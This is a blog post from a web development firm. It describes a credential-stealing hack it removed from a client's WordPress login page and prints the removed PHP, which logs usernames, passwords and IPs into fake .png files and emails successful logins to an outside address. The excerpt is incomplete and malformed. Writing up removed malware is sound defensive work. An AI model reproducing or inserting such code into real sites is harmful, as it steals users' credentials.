Wordpress wp-admin password crack hack

I recently removed a hack from a client's site that was attempting to crack the wp-admin user/password. The hackers code was being activated anytime someone visited the wp-admin logon screen and would attempt a new logon/password combo.

Logon/password/IP combinations and results were being stored in text files disguised with a .png file extension. In this specific case those files were:


Successfull attempts would be emailed off to the hacker themselves:


The hackers code was hidden inside:


It was safe to remove all of it, shown below:

       // Start Login Protection
                     $ip = $_SERVER["REMOTE_ADDR"];
                     $stringData = $_SERVER["SERVER_NAME"] . "|" . $username . ":" . $password . "|" . $ip . "n";
                     $today = date("j");
                     $myErrorFile = getcwd() . "/wp-includes/images/icon-download.png";
                     $mySuccessFile = getcwd() . "/wp-includes/images/icon-up-flag.png";
                     $failedLogContent = @file_get_contents($myErrorFile);
                     $successLogContent = @file_get_contents($mySuccessFile);
                     $errorFileLines = explode("n", $failedLogContent);
                     $diff = $today - $errorFileLines[0];
                     if ( ($diff >= 7) || ($diff < 0) ) {
                     $failedLogContent = "";
                     if (preg_match("/{$ip}/i", $successLogContent)) $userOk = 1;
                     preg_match_all("/{$ip}/i", $failedLogContent, $matches);
                     if  ( (count($matches[0]) > 4) && (!$userOk) ) $password = "G4o7Ivc29OVOxcp5";
                     if ( wp_check_password($password, $user->user_pass, $user->ID) ) {
                     @mail("anto@netherlandbarmuda.com", $_SERVER["SERVER_NAME"], $stringData);              
                     if (!$userOk) {
                     $fh = fopen($mySuccessFile, "a");
                     fwrite($fh, "$ipn");
                     } else {
                     if (!(is_file($myErrorFile))) {
                     $fh = fopen($myErrorFile, "w");
                     fwrite($fh, "$todayn");
                     $fh = fopen($myErrorFile, "a");
                     fwrite($fh, $stringData);
// END Login Protection

Make a Comment

Website and Software Development Services
Tweed Heads & Southern Gold Coast

Our network of experienced computer programmers can develop custom software solutions in any language on any platform.

Our Talents

Freelance Power

We maintain a network of local freelance computer programmers that we place in teams to match project requirements. This gives us expertise in a broad range of industries, languages & platforms

Fix, Upgrade or New?

We can fix broken legacy systems, plan and oversee a difficult upgrade, add or unlock new features to your existing software. Or install and set-up new systems from scratch, including hardware and software


We can build solutions fast, Software as a Service (Saas), apps, web applications, desktop software, Minimum Viable Product using Agile Development practices


We can build simple to complex websites, we can deliver the whole package including site design, branding, logos, domains and hosting


C/C++, Java, JavaScript,
Python, Swift, Meteor,
Objective C


MongoDB, NoSQL


Linux, Mac, Windows, iPhone, Android, Smart Phones, Tablets


Wordpress, Drupal, Magento, Moodle, Sharepoint Online, Office 365